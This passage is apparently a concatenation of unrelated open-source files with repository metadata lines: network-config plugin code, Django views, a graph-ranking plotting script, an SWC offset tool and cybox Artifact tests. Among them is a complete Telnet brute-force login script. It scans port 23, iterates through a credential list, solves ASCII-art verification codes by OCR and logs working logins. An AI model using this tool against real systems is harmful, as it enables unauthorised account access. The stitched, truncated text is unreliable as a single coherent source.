err = str(sys.exc_info()[1])
#self.log.error(self.PluginName+" --mask "+data+" : "+err)
self.output.error(err)
return 1
return 0
def gate(self, data):
''' function associated with the option previously defined in getopts
You must have one function for each option '''
try:
self.updateKeyListEntry(['gateway:'+data])
except:
err = str(sys.exc_info()[1])
#self.log.error(self.PluginName+" --gate "+data+" : "+err)
self.output.error(err)
return 1
return 0
def _get_device_name(self):
dev = re.sub('.*conf.', '', re.sub('.ip$', '', self.PluginFqn))
if re.search('^vlan', dev):
tmpstr = dev
dev = re.sub('vlans.', '', tmpstr)
if re.search('^bonds', dev):
tmpstr = dev
dev = re.sub('bonds.', '', tmpstr)
if re.search('^aliases', dev):
tmpstr = dev
dev = re.sub('aliases.', '', tmpstr)
return dev
def updateCurrentConfigNewValue(self, data_list, separator = ':'):
'''
Take the parameter of a short set command (ip or mask),
retrieve the current configuration, change it with the new setting,
and set the new, valid config.
Input:
data_list contains a list of Key:Values.
By default a Key and a Value is separated by ":".
ip:1.1.1.1
netmask:255.255.255.255
gateway:10.165.20.1
The separator can be overwriten by the "separator" parameter.
Note that the separator must be the same as the one used in the original configuration.
'''
try:
#keeps current config
dic = {'ip':'0.0.0.0','netmask':'0'}
#Get the current configuration
org_list = self.getConfig().split(' ')
IP_POS=0
MASK_POS=1
#get the current configured ip
for entry in org_list:
if re.search('/', entry):
curr_ip = entry.split('/')
dic['ip']=curr_ip[IP_POS]
dic['netmask']=curr_ip[MASK_POS]
#get the new config and change the old
for newEntry in data_list:
key_type,key = newEntry.split(separator)
if re.search('/', key):
ip_addr = key.split('/')
dic['ip']=ip_addr[IP_POS]
dic['netmask']=ip_addr[MASK_POS]
else:
if key_type == 'ip' or key_type == 'netmask':
dic[key_type] = key
elif key_type == 'gateway':
self.log.error("Unsupported option gateway")
else:
self.log.error("Unsupported option in updateCurrentConfigNewValue")
#todo
# Finaly recreate the list with the updated content
list = []
list.append(dic['ip']+'/'+dic['netmask'])
self.set(list)
except:
err = str(sys.exc_info()[1])
self.log.error("updateKeyListEntry "+self.PluginName+": "+err)
self.output.error(err)
return 1
return 0
def addSimpleListEntry(self, data_list):
''' add data_list to plugin entry of type List.
data_list contains a list of simple values to add.
'''
try:
org_list = self.getConfig().split(',')
org_list.extend(data_list)
self.set(org_list)
except:
err = str(sys.exc_info()[1])
self.log.error("addSimpleListEntry "+self.PluginName+": "+err)
self.output.error(err)
return 1
return 0
| gpl-2.0 | 1,970,613,429,138,987,000 | 27.213938 | 127 | 0.590763 | false |
crankycoder/oabutton-py | oabutton/oabutton/apps/bookmarklet/views.py | 1 | 2510 | from django.http import HttpResponse, HttpResponseServerError
from django.shortcuts import render
from django.core import serializers
from models import Event
try:
from simplejson import dumps
except:
from json import dumps
# TODO: we should really break up the view URLs here to separate the
# OAButton facing website from the bookmarklet URLs.
def homepage(req):
return render(req, 'bookmarklet/site/index.html')
def about(req):
return render(req, 'bookmarklet/site/about.html')
def show_stories(req):
# we only grab the 50 latest stories
# the original node code grabbed all stories which will kill your
# database
latest_stories = Event.objects.all().order_by('-pub_date')[:50]
count = Event.objects.count()
context = {'title': 'Stories', 'events': latest_stories, 'count': count}
return render(req, 'bookmarklet/site/stories.html', context)
def show_map(req):
# TODO: we need to make this smarter. Coallescing the lat/long
# data on a nightly basis and folding that down into clustered
# points would mean we throw less data down to the browser
count = Event.objects.count()
json_data = serializers.serialize("json", Event.objects.all())
context = {'title': 'Map', 'events': json_data, 'count': count }
return render(req, 'bookmarklet/site/map.html', context)
def get_json(req):
# Dump all data as JSON. This seems like a terrible idea when the
# dataset gets large.
json_data = serializers.serialize("json", Event.objects.all())
return HttpResponse(json_data, content_type="application/json")
def add(req):
# Display an entry page
# How does the DOI get in automatically? This seems really wrong.
# At the least, we need a test here to illustrate why this should
# work at all.
return render('sidebar/index.html', context={'url': req.query.url, 'doi': req.query.doi})
def add_post(req):
# Handle POST
event = Event()
# Where does the coords come from? This seems like it's using the
# HTML5 locationAPI. Need to dig around a bit
coords = req['coords'].split(',')
event.coords_lat = float(coords[0])
event.coords_lng = float(coords[1])
try:
event.save()
except Exception, e:
return HttpResponseServerError(e)
scholar_url = ''
if req.body['doi']:
scholar_url = 'http://scholar.google.com/scholar?cluster=' + 'http://dx.doi.org/' + req['doi']
return render('sidebar/success.html', {'scholar_url': scholar_url})
| mit | -3,371,336,796,552,659,500 | 34.352113 | 102 | 0.688048 | false |
ryanbressler/GraphSpectrometer | plotpredDecomp.py | 1 | 3795 | """
plotjsondecomp.py
Script to make plots from json files calculated by fiedler.py for random forest
predictor files.
usage:
python plotjsondecomp.python fiedler.out.json
or often:
ls *.json | xargs --max-procs=10 -I FILE python plotjsondecomp.py FILE
This script also updates the json file to include two additional fields: the value of the grad
component of the hodge decomposition and the rank produced by it:
The best visualization of a random forest predictor is given by r1 and hodge.
{"f1": the first fiedler vector,
"f2": (if caclulated) the second fideler vector
"d": the node degrees,
"r1": the rank of each node in the first fiedler vector
"r2": the rank of each node in the second fiedler vector
"iByn": the index of the nodes by the string used to represent them in
the input file
"nByi": the string used to represent nodes in the input file by their
index in the graph
"adj": the adjascancy list,
["hodge": the values of the gradient from hodge decomposition,
"hodgerank": the hodge rank]}
"""
import os
import sys
import json
import numpy
from numpy import asarray, eye, outer, inner, dot, vstack
from numpy.random import seed, rand
from numpy.linalg import norm
from scipy.sparse.linalg import cg, lsqr
import scipy.sparse
from pydec import d, delta, simplicial_complex, abstract_simplicial_complex
import fiedler
def plotjson(fn):
"""
plotjson: make plots from json output of fiedler.py
fn: the filename of the json file
"""
fo=open(fn)
data=json.load(fo)
fo.close()
if "adj" in data:
(A,adj,Npts) = fiedler.adj_mat(data["adj"])
#A = (A.T - A)/2
A=A.tocoo()
pos=A.data!=0
skew = numpy.column_stack((A.row[pos],A.col[pos],A.data[pos])).tolist()
# method from ranking driver.py
asc = abstract_simplicial_complex([numpy.column_stack((A.row[pos],A.col[pos])).tolist()])
B1 = asc.chain_complex()[1] # boundary matrix
rank = lsqr(B1.T, A.data[pos])[0] # solve least squares problem
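# 'rank' holds the node potentials (the gradient component of the Hodge decomposition of the edge flow); its double argsort below gives the 'hodgerank' ordering stored in the JSON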
# sc = simplicial_complex(([[el] for el in range(0,A.shape[0])],numpy.column_stack((A.row[pos],A.col[pos])).tolist()))
# omega = sc.get_cochain(1)
# omega.v[:] = A.data[pos]
# p = omega.k
# alpha = sc.get_cochain(p - 1)
#
# alpha.v = rank
# v = A.data[pos]-d(alpha).v
#
# cyclic_adj_list=numpy.column_stack((A.row[pos],A.col[pos],v)).tolist()
# div_adj_list=numpy.column_stack((A.row[pos],A.col[pos],d(alpha).v)).tolist()
data["hodge"]=list(rank)
data["hodgerank"]=list(numpy.argsort(numpy.argsort(rank)))
print "Adding hodge results to %s"%(os.path.abspath(fn))
fo = open(fn,"w")
json.dump(data,fo, indent=2)
fo.close()
# A.data = A.data * .25
# alist=fiedler.adj_list(A)
# fn=fn+".abstract"
# #fiedler.doPlots(numpy.array(data["f1"]),-1*numpy.array(rank),numpy.array(data["d"]),alist,fn+".all.v.grad.",widths=[24],heights=[6],vsdeg=False,nByi=data["nByi"],directed=False)
# try:
# print "Ploting ", fn
# fiedler.doPlots(numpy.argsort(numpy.argsort(numpy.array(data["f1"]))),-1*numpy.array(rank),numpy.array(data["d"]),alist,fn+"fied.rank.v.hodge",widths=[24],heights=[16],vsdeg=False,nByi=data["nByi"],directed=False,dorank=False)
# except ValueError:
# print "ValueError ploting ", fn
# print "A", A.shape,"A.data",A.data.shape,A.row.shape,A.col.shape,"pos",pos.shape,"B1.T.shape", B1.T.shape, "A.data[pos]", A.data[pos].shape, "rank", rank.shape, "numpy.array(data[\"f1\"])", numpy.array(data["f1"]).shape
# pass
def main():
fn=sys.argv[1]
plotjson(fn)
if __name__ == '__main__':
main() | bsd-3-clause | 6,372,562,606,690,363,000 | 33.825688 | 240 | 0.635046 | false |
braian87b/BruteForceTelnetPy | brute_force_telnet_login.py | 1 | 6288 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import telnetlib
import sys
import os
import hashlib
cred_file = None
def get_hash_from_string(string):
hasher_engine = hashlib.md5()
hasher_engine.update(string)
return hasher_engine.hexdigest()
def port_scan(host):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect_ex((host, 23))
if connect == 0:
print "[+]\tPort 23: Open"
s.close()
return True
else:
print "[-]\tPort 23: Closed"
s.close()
return False
def save_last_index(last_index):
with open("last_index.txt", "w+") as f:
f.write(str(last_index))
def read_last_index():
try:
with open("last_index.txt", "r+") as f:
last_index = f.read()
except IOError as e:
last_index = 0
return int(last_index) if last_index else 0
def get_credentials(passwords_file):
last_index = read_last_index()
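# resume from where the previous run left off (index persisted in last_index.txt by save_last_index)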
global cred_file
if not cred_file:
print "Opening...", passwords_file
cred_file = open(passwords_file, 'r')
for i in range(0, last_index):
cred_file.readline()
line = cred_file.readline()
user = ""
if ":" in line:
user_password = line.split(':')
user = user_password[0]
password = user_password[1]
else:
password = line
save_last_index(last_index + 1)
return user, password
def truncate(text, start=None, end=None):
if start:
text = text[text.find(start):]
if end:
text = text[:text.find(end) + len(end)]
return text
def truncate_including(text, start=None, end=None):
if start:
text = text[text.find(start) + len(start):]
if end:
text = text[:text.find(end)]
return text
def digit_ocr_verification_code(digit_text=""):
filename = "digit_" + get_hash_from_string(digit_text) + ".txt"
if os.path.exists(filename):
digit_value = open(filename, 'r').read()
else:
while True:
print "Unknown digit:"
print digit_text
digit_value = raw_input("Please enter digit (will be saved for later usage): ")
if len(digit_value) == 1:
break
with open(filename, 'w+') as f:
f.write(digit_value)
return digit_value
def ocr_verification_code(text=""):
"""
Function allows to read digits from text like
# ====================================================
# * * * * * * * * * * * * * * * *
# * * * * *
# * * * * * * * * * * * * *
# * * * * *
# * * * * *
# * * * * * * * * * * * * *
# ====================================================
"""
digits_spacing = 13
text = text.replace('\r\n', '\n')
text = truncate_including(text, '==\n', '\n==')
digits = [] # we store digits
for line in text.split('\n'): # we read digits line by line
if not digits:
digits = ["" for x in range(len(line) / digits_spacing)]
reading_line = line
line_parts = []
while True:
line_part = reading_line[:digits_spacing]
if line_part:
line_parts.append(reading_line[:digits_spacing].rstrip(' ')) # rstrip
reading_line = reading_line[digits_spacing:]
else:
break
for index, line_part in enumerate(line_parts):
digits[index] = digits[index] + line_part + '\n'
ocr = ""
for digit in digits:
ocr = ocr + digit_ocr_verification_code(digit)
return ocr
def brute_login(host, passwords_file):
tn = None # telnet connection
need_user = False # need's username
while True: # main while, we don't go out until Valid Cred. found
try:
if not tn:
asked_password_in_cnx = False
tn = telnetlib.Telnet(host)
# tn.debuglevel = 10
print "[-]\tPort 23: Connecting..."
while True: # while requesting input
response = tn.read_until(":", 1) # until input request
if "verification code:" in response:
verif_code = ocr_verification_code(response)
print "[+] Entering Verif. Code:\t" + verif_code
tn.write(verif_code + "\n")
elif "Login:" in response:
need_user = True
asked_password_in_cnx = False # Last time asked for password in this connection?
user, password = get_credentials(passwords_file)
print "[+] Trying user:\t" + user
tn.write(user + "\n")
elif "Password:" in response:
if asked_password_in_cnx and need_user:
tn.close() # we should try next pair user/password
break # TODO FIX: allow multiple password from same user
asked_password_in_cnx = True # Last time asked for password in this connection?
if not need_user: # didn't ask for username, we read password
user, password = get_credentials(passwords_file)
if not password:
print "[-] No more Credentials to try"
sys.exit(0)
print "[+] Trying password:\t" + password
tn.write(password + "\n")
if ">" in response:
with open("valid_credentials.txt", "a") as f:
print "[+] Valid Credentials found:\t" + ' : '.join((user, password))
f.write("Valid Credentials found: " + ' : '.join((user, password)) + '\n')
break # Get out from input request while
if ">" in response:
break # Get out from main while
except EOFError as e:
pass # Disconnected, no problem, we will connect again.
if __name__ == "__main__":
if port_scan(sys.argv[1]):
brute_login(sys.argv[1], sys.argv[2])
| mit | -6,661,056,122,699,512,000 | 33.549451 | 101 | 0.499682 | false |
ruozi/GetSchemeUrl_From_IPA | GetSchemeUrl.py | 1 | 1665 | #!/usr/bin/env python
#
# Scan IPA file and parse its Info.plist and report the SchemeUrl result.
#
# Copyright (c) 2015 by Ruozi,Pinssible. All rights reserved.
import zipfile
import os
import sys
import re
import plistlib
class GetSchemeUrl:
plist_file_rx = re.compile(r'Payload/.+?\.app/Info.plist$')
schemeurl_key_rx = re.compile(r'CFBundleURLSchemes')
def __init__(self,ipa_filename):
self.ipa_filename = ipa_filename
self.errors = []  # used by extract_scheme_url() to record parsing problems
def get_filename_from_ipa(self):
zip_obj = zipfile.ZipFile(self.ipa_filename, 'r')
regx = GetSchemeUrl.plist_file_rx
filenames = zip_obj.namelist()
filename = ''
for fname in filenames:
if regx.search(fname):
filename = fname
break
return {'filename':filename, 'zip_obj': zip_obj}
def extract_scheme_url(self):
ipa_file = self.get_filename_from_ipa()
plist_filename = ipa_file['filename']
zip_obj = ipa_file['zip_obj']
urlschemes = []
if plist_filename == '':
self.errors.append('Info.plist file not found in IPA')
else:
content = zip_obj.read(plist_filename)
data = plistlib.readPlistFromString(content)
urltypes = data['CFBundleURLTypes']
urlschemes = urltypes[0]['CFBundleURLSchemes']
return urlschemes
if __name__ == '__main__':
test_file_path = r'/Users/Ruozi/Music/iTunes/iTunes Media/Mobile Applications/SketchBook 3.1.2.ipa'
getter = GetSchemeUrl(test_file_path)
print getter.extract_scheme_url()
sys.exit(0)
| gpl-2.0 | -5,124,134,703,800,660,000 | 27.706897 | 103 | 0.618018 | false |
Casarella/TRAPPER | TRAPPER.py | 1 | 10626 | #RedTrProb.py
#TRAPPER - TRAnsition Probability Processing/computER
#c. Jan 27, 2017 - Clark Casarella
# Updated to output to a LaTeX friendly table to the output file
# Does not take uncertainty in mixing into account
import math as m
import scipy.constants as sc
import numpy as np
csvpath=input("Enter path to csv file (including file extension): ")
print('Using the input parameters from',str(csvpath)+':')
outpath=input("Enter output path/filename (will be a text file): ")
print('Output placed at:',outpath)
output_file=open(outpath,'w')
#see_weisskopf_units=input("Do you want to see the Weisskopf unit conversion? [Y/N]")
#csvpath='162Dy_GRID.csv'
#csvpath='../162Dy_GRID/162Dy_GRID.csv'
#output_file=open('out.TEST','w')
dtype_full=[('E_g','f8'),('E_g_error','f8'),
('I_g','f8'),('I_g_error','f8'),('I_g_total','f8'),
('delta_mixing','f8'),('delta_upper','f8'),('delta_lower','f8'),
('tau','f8'),('tau_up','f8'),('tau_down','f8'),
('alpha_conv','f8'),('alpha_conv_error','f8'),
('A','int'),('multipolarity','S6'),
('E_level','f8')]
ndtype=str
npnames=['E_g','E_g_error','I_g','I_g_error','I_g_total',
'delta_mixing','delta_upper','delta_lower',
'tau','tau_up','tau_down','alpha_conv','alpha_conv_error',
'A','multipolarity','E_level']
csvfile = np.genfromtxt(csvpath,delimiter=",",skip_header=1,names=npnames,dtype=dtype_full)
#print('array:',csvfile)
#Test single input section
#E_g=0.888157
#I_g=174.8
#I_tot=369.3
#delta=0
#tau=2830*10**-15
#alpha_conv=0.0032
#multipolarity='E2'
#A=162
#E_g=1.31303
#I_g=0.428
#I_tot=1
#delta=0.28
#delta_up=0.34
#tau=320*10**-15
#alpha_conv=0
#multipolarity='E2(M1)'
#A=160
def set_multipolarity():
"""
Returns and extracts the multipolarity of a transition
Decoded from UTF-8 encoding on the string keyed 'multipolarity'
"""
#multipolarity=csvfile[0][14].decode("utf-8")[-1]
if multipolarity[-1]=='1':
return 1
elif multipolarity[-1]=='2':
return 2
else:
#return 2
return 'E2(M1)'
def BwE(A):
"""
Weisskopf estimate for an electric type, multipolarity
l transition, in units of e^2*fm^l
(1 W.u. = XXX e^2fm^l)
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return 0.12**(2*l)/(4*m.pi)*(3/(l+3))**2*A**(2*l/3)
def BwM(A):
"""
Weisskopf estimate for an magnetic type, multipolarity l transition,
in units of mu_N^2
"""
l=set_multipolarity()
if l=='E2(M1)':
l=1
return 0.12**(2*(l-1))*10/m.pi*(3/(l+3))**2*A**(2*(l-1))
def doublefactorial(n):
"""
Double factorial (every other n factorialed)
"""
if n <=0:
return 1
else:
return n*doublefactorial(n-2)
def mult_coefficient():
"""
This coefficient removes angular momentum mixing from the transition
probabilities.
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return l*(doublefactorial(2*l+1))**2/(l+1)
#return l*(2*l+1)**2/(l+1)
#print('Coefficient for L:',mult_coefficient())
#print('BwE:',BwE(162))
def mixing_fraction(delta):
"""
Multipole mixing fraction for any mixed-multipolarity transitions
Unitless, and calculates relative E2 strength to M1 B(E2) strength
"""
#delta=csvfile[1][14][5]
l=set_multipolarity()
if l=='E2':
l=2
if delta==0 or l==1:
return 1
elif delta!=0 and l=='E2(M1)':
return delta**2/(1+delta**2)
#print(mixing_fraction(0.64))
def BR():
"""
Returns branching ratio (ratio of measured intensity to total intensity leaving the state)
"""
return I_g/I_tot
#print('Mixing Fraction Delta:',mixing_fraction(delta))
#units from scipy - generally helps with precision
m_p=sc.value('proton mass energy equivalent in MeV')
hc=sc.value('Planck constant over 2 pi times c in MeV fm')
hbar=sc.value('Planck constant over 2 pi in eV s')/10**6
barn=10**2
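# 1 barn = 100 fm^2; barn**l is used in units() when converting the Weisskopf estimate between e^2 fm^(2l) and e^2 b^l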
def B_coefficients():
"""
Calculates coefficients for the final B(pl) calculation.
Makes an exception for E1 transitions, traditionally reported in mW.u.
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
if multipolarity=='E1':
return hbar/(8*m.pi)*mult_coefficient()*hc**(1+2*l)*1000
else:
return hbar/(8*m.pi)*mult_coefficient()*hc**(1+2*l)
def units():
"""
Corrects the units from e^2b^l to W.u.
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
if multipolarity[0]=='E':
return barn**l*sc.alpha*sc.hbar/10**-9*sc.c/sc.e*BwE(A) # check here
elif multipolarity[0]=='M':
return hc*sc.alpha*BwM(A)*(hc/(2*m_p))**2 #check here again
#print('Units from MeVfm to W.u.:',units())
def latex_friendly_units():
"""
Returns LaTeX-friendly units for copying-pasting into LaTeX documents
"""
l=multipolarity
if l=='E1':
return 'mW.u.'
elif l=='E2':
return 'W.u.'
elif l=='M1':
return '$\mu_N^2$'
else:
return 'W.u. (mixed)'
def B(tau):
"""
Calculation of transition probability B(pl) from all inputs necessary
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
if l==1:
return round(mixing_fraction(delta)*BR()/(tau*10**-15*(1+alpha_conv)*E_g**(2*l+1))*B_coefficients()/units(),3)
else:
return round(mixing_fraction(delta)*BR()/(tau*10**-15*(1+alpha_conv)*E_g**(2*l+1))*B_coefficients()/units(),2)
#determine delta_upper bounds on error
def mixing_upper_bounds():
"""
Determines which bound should be used for a particular mixing fraction
- Used in error propagation -
If delta <0, then the most E2 mixing will occur at the most negative number
(delta-delta_lower)
if delta >0, then the most E2 mixing will occur at the most positive number
(delta+delta_upper)
"""
if delta<0:
return delta-delta_lower
elif delta>0:
return delta+delta_upper
else:
return 0
def mixing_lower_bounds():
"""
Performs a similar function to finding the upper bounds on mixing,
Only on the lower bounds
"""
if delta<0:
return delta+delta_upper
elif delta>0:
return delta-delta_lower
else:
return 0
#Error propagation for symmetric quantities:
def dBdE():
#"""
#Uncertainty in B with respect to gamma
#ray energy
#"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round((-B(tau)/E_g*(2*l+1)*E_g_error)**2,3)
def dBdI():
"""
Uncertainty in B with respect to gamma
ray intensity
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round((B(tau)/I_g*I_g_error)**2,3)
def dBdalpha():
"""
Uncertainty in B with respect to internal
conversion coefficient
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round((-B(tau)/(1+alpha_conv)*alpha_conv_error)**2,3)
"""
Asymmetric error is calculated via a 'consistent addition
technique' where B is calculated from the 'highest' value
and then subtracting the nominal value, etc
"""
def dBdtau_up():
"""
Calculation of B for the longest lifetime,
for use in error propagation
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round(B(tau_down),3)
def dBdtau_down():
"""
Calculation of B for the shortest lifetime,
for use in error propagation
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round(B(tau_up),3)
def uncertainty_tau_upper():
return round((-B(tau)+dBdtau_up())**2,3)
def uncertainty_tau_lower():
return round((B(tau)-dBdtau_down())**2,3)
#def calc_unc_delta_upper():
#"""
#This is an odd section, I need to calculate B under two
#delta conditions, upper and nominal,
#and subtract the two like I did for tau
#"""
#l=set_multipolarity()
#if l=='E2(M1)':
#tempB=B(tau)
#delta=mixing_upper_bounds()
#return -tempB+B(tau)
#else:
#return 0
#Aggregate uncertainty (upper bound)
def upper_uncertainty():
"""
Returns the upper bound for final, added in quadrature
uncertainty in B from any sources of uncertainty
in measured quantities.
"""
return round((dBdE()+dBdI()+dBdalpha()+uncertainty_tau_upper())**0.5,3)
#Aggregate uncertainty (lower bound)
def lower_uncertainty():
"""
Returns the lower bound for final, added in quadrature
uncertainty in B from any sources of uncertainty
in measured quantities.
"""
return round((dBdE()+dBdI()+dBdalpha()+uncertainty_tau_lower())**0.5,3)
#LaTeX Table header
output_file.write('\\begin{table}[ht]\n')
output_file.write('\\begin{tabular}{l|l|l|l|l|l|l}\n')
header1='E$_{lev}$ (keV) & E$_{\gamma}$ (keV) & I$_{\gamma}$ & ${\\tau}$ (fs)'
header2=' & $\pi\\ell$ & $\delta$ & B($\pi\\ell$) (W.u.) '
#Terminal Outputs - Not LaTeX friendly
output_file.write(header1+header2+'\\\\\hline\hline\n')
for row in list(range(len(csvfile))):
E_g=csvfile[row]['E_g']
E_g_error=csvfile[row]['E_g_error']
I_g=csvfile[row]['I_g']
I_g_error=csvfile[row]['I_g_error']
I_tot=csvfile[row]['I_g_total']
delta=csvfile[row]['delta_mixing']
delta_upper=csvfile[row]['delta_upper']
delta_lower=csvfile[row]['delta_lower']
tau=csvfile[row]['tau']
tau_up=csvfile[row]['tau_up']-tau
tau_down=tau-csvfile[row]['tau_down']
alpha_conv=csvfile[row]['alpha_conv']
alpha_conv_error=csvfile[row]['alpha_conv_error']
A=csvfile[row]['A']
multipolarity=csvfile[row]['multipolarity'].decode("utf-8")
E_lev=csvfile[row]['E_level']
#print('mixing',calc_unc_delta_upper(),tempB)
lineEnergy=str(round(E_lev,2)).ljust(16,' ')+'& '+(str(round(E_g*1000,2))+' ('+str(int(E_g_error*1000))+')').ljust(19,' ')+'& '
lineIntensity=(str(round(I_g,1))+' ('+str(int(I_g_error*10))+')').ljust(13,' ')+'& '+(str(int(tau))+'$^{+'+str(tau_up+tau)+'}_{'+str(tau_down-tau)+'}$').ljust(28,' ')+'& '
lineLifetime=str(multipolarity).ljust(10,' ')+'& '
lineDelta=(str(delta)+' $^{+'+str(delta_upper)+'}_{-'+str(delta_lower)+'}$').ljust(20,' ')+'& '
lineMult=(str(round(B(tau),2))+' $^{+'+str(round(-upper_uncertainty()+B(tau),2))+'}_{'+str(round(B(tau)-lower_uncertainty(),2))+'}$ '+latex_friendly_units()).ljust(30,' ')+'\\\\ \n'
output_file.write(lineEnergy+lineIntensity+lineLifetime+lineDelta+lineMult)
print('B('+multipolarity+')=',B(tau),'p\m',upper_uncertainty(),latex_friendly_units(),'for the',E_g*1000,'keV transition leaving the',E_lev,'keV state')
output_file.write('\\end{tabular}\n')
output_file.write('\caption{REMEMBER TO CHANGE TABLE CAPTION AND REFERENCE TAG HERE! \label{tab:BE2}}\n')
output_file.write('\\end{table}')
output_file.close()
| gpl-3.0 | 8,386,165,941,889,741,000 | 28.434903 | 185 | 0.621212 | false |
nathantspencer/webknossos_toolkit | swc_tools/swc_offset.py | 1 | 1563 | import sys
def index_of(line):
return line.split()[0]
def type_of(line):
return line.split()[1]
def x_of(line):
return line.split()[2]
def y_of(line):
return line.split()[3]
def z_of(line):
return line.split()[4]
def radius_of(line):
return line.split()[5]
def parent_of(line):
return line.split()[6]
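# Shift every node's x/y/z by the given offsets and write the result to <input name>_offset.swc next to the input file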
def offset(swc_path, x_offset, y_offset, z_offset):
f = open(swc_path, 'r')
lines = f.readlines()
lines_to_write = []
f.close()
for line in lines:
line.strip()
new_index = index_of(line) + ' '
new_type = type_of(line) + ' '
new_radius = radius_of(line) + ' '
new_parent = parent_of(line) + '\n'
new_x = str(float(x_of(line)) + x_offset) + ' '
new_y = str(float(y_of(line)) + y_offset) + ' '
new_z = str(float(z_of(line)) + z_offset) + ' '
line_to_write = new_index + new_type + new_x + new_y + new_z + new_radius + new_parent
lines_to_write.append(line_to_write)
f = open(swc_path[:-4] + '_offset.swc', 'w')
for line in lines_to_write:
f.write(line)
f.close()
if __name__ == "__main__":
if len(sys.argv) != 5:
print('\nSWC_OFFSET -- Written by Nathan Spencer 2017')
print('Usage: python swc_offset.py ["path/to/swc/file.swc"] [float x-offset] [float y-offset] [float z-offset]')
else:
swc_file = sys.argv[1]
x_offset = float(sys.argv[2])
y_offset = float(sys.argv[3])
z_offset = float(sys.argv[4])
offset(swc_file, x_offset, y_offset, z_offset)
| mit | 7,372,109,832,491,850,000 | 25.491525 | 120 | 0.557901 | false |
CybOXProject/python-cybox | cybox/test/objects/artifact_test.py | 1 | 15713 | # Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
import base64
import unittest
from zlib import compress
from mixbox.vendor import six
from mixbox.vendor.six import u
from cybox.objects.artifact_object import (Artifact, Base64Encoding,
Bz2Compression, Encoding, EncodingFactory, Packaging, RawArtifact,
XOREncryption, ZlibCompression)
from cybox.test import round_trip
from cybox.test.objects import ObjectTestCase
class TestRawArtifact(unittest.TestCase):
def test_xml_output(self):
# A RawArtifact stores a Unicode string, even though it typically
# consists only of valid Base64 characters.
data = u("0123456789abcdef")
ra = RawArtifact(data)
expected_data = data.encode('utf-8')
self.assertTrue(expected_data in ra.to_xml())
class TestArtifactEncoding(unittest.TestCase):
def test_cannot_create_artifact_from_unicode_data(self):
self.assertRaises(ValueError, Artifact, u("abc123"))
def test_setting_ascii_artifact_data_no_packaging(self):
a = Artifact()
a.data = b"abc123"
self.assertEqual(six.binary_type, type(a.data))
self.assertEqual(six.text_type, type(a.packed_data))
def test_cannot_set_nonascii_data_with_no_packaging(self):
a = Artifact()
# You can set this data, but if you don't add any packaging, you should
# get an error when trying to get the packed data, since it can't be
# encoded as ASCII.
a.data = b"\x00abc123\xff"
self.assertEqual(six.binary_type, type(a.data))
self.assertRaises(ValueError, _get_packed_data, a)
# With Base64 encoding, we can retrieve this.
a.packaging = Packaging()
a.packaging.encoding.append(Base64Encoding())
self.assertEqual("AGFiYzEyM/8=", a.packed_data)
def test_setting_ascii_artifact_packed_data_no_packaging(self):
a = Artifact()
a.packed_data = u("abc123")
self.assertEqual(six.binary_type, type(a.data))
self.assertEqual(six.text_type, type(a.packed_data))
def test_cannot_set_nonascii_artifact_packed_data(self):
a = Artifact()
a.packed_data = u("\x00abc123\xff")
self.assertEqual(six.text_type, type(a.packed_data))
# TODO: Should this raise an error sooner, since there's nothing we can
# do at this point? There's no reason that the packed_data should
# contain non-ascii characters.
self.assertRaises(UnicodeEncodeError, _get_data, a)
class TestArtifact(ObjectTestCase, unittest.TestCase):
object_type = "ArtifactObjectType"
klass = Artifact
ascii_data = b"ABCDEFGHIJKLMNOPQRSTUVWZYZ0123456879"
binary_data = b"\xde\xad\xbe\xef Dead Beef"
# The raw_artifact data in a JSON/dict representation should always be
# ASCII byte data (typically Base64-encoded, but this is not required).
_full_dict = {
'raw_artifact': "Here is a blob of text.",
'type': Artifact.TYPE_NETWORK,
'xsi:type': object_type,
}
def test_set_data_and_packed_data(self):
a = Artifact()
self.assertEqual(a.data, None)
self.assertEqual(a.packed_data, None)
a.data = b"Blob"
self.assertRaises(ValueError, _set_packed_data, a, u("blob"))
a.data = None
a.packed_data = u("Blob")
self.assertRaises(ValueError, _set_data, a, b"blob")
a.packed_data = None
def test_round_trip(self):
# Without any packaging, the only data an Artifact can encode
# successfully is ASCII data.
a = Artifact(self.ascii_data, Artifact.TYPE_GENERIC)
a2 = round_trip(a, Artifact)
self.assertEqual(a.to_dict(), a2.to_dict())
def test_non_ascii_round_trip_raises_error(self):
a = Artifact(self.binary_data, Artifact.TYPE_GENERIC)
# Since the data is non-ASCII, this should raise an error.
self.assertRaises(ValueError, round_trip, a, Artifact)
def test_base64_encoding(self):
a = Artifact(self.binary_data)
a.packaging = Packaging()
a.packaging.encoding.append(Base64Encoding())
a2 = round_trip(a, Artifact)
self.assertEqual(self.binary_data, a2.data)
expected = base64.b64encode(self.binary_data).decode('ascii')
self.assertEqual(expected, a2.packed_data)
def test_zlib_base64_encoding(self):
a = Artifact(self.binary_data)
a.packaging = Packaging()
a.packaging.compression.append(ZlibCompression())
a.packaging.encoding.append(Base64Encoding())
a2 = round_trip(a, Artifact)
self.assertEqual(self.binary_data, a2.data)
expected = base64.b64encode(compress(self.binary_data)).decode('ascii')
self.assertEqual(expected, a2.packed_data)
def test_encryption(self):
a = Artifact(self.binary_data)
a.packaging = Packaging()
a.packaging.encryption.append(XOREncryption(0x4a))
a.packaging.encoding.append(Base64Encoding())
a2 = round_trip(a, Artifact)
self.assertEqual(self.binary_data, a2.data)
def test_compression(self):
a = Artifact(self.binary_data)
a.packaging = Packaging()
a.packaging.compression.append(Bz2Compression())
a.packaging.encryption.append(XOREncryption(0x4a))
a.packaging.encoding.append(Base64Encoding())
a2 = round_trip(a, Artifact)
self.assertEqual(self.binary_data, a2.data)
def test_custom_encoding(self):
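        # Demonstrates extending the packaging layer: an Encoding subclass
        # registered via EncodingFactory.register_extension takes part in
        # pack/unpack round trips alongside the built-in algorithms.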
@EncodingFactory.register_extension
class Base32Encoding(Encoding):
_ENCODING_TYPE = "Base32"
def __init__(self):
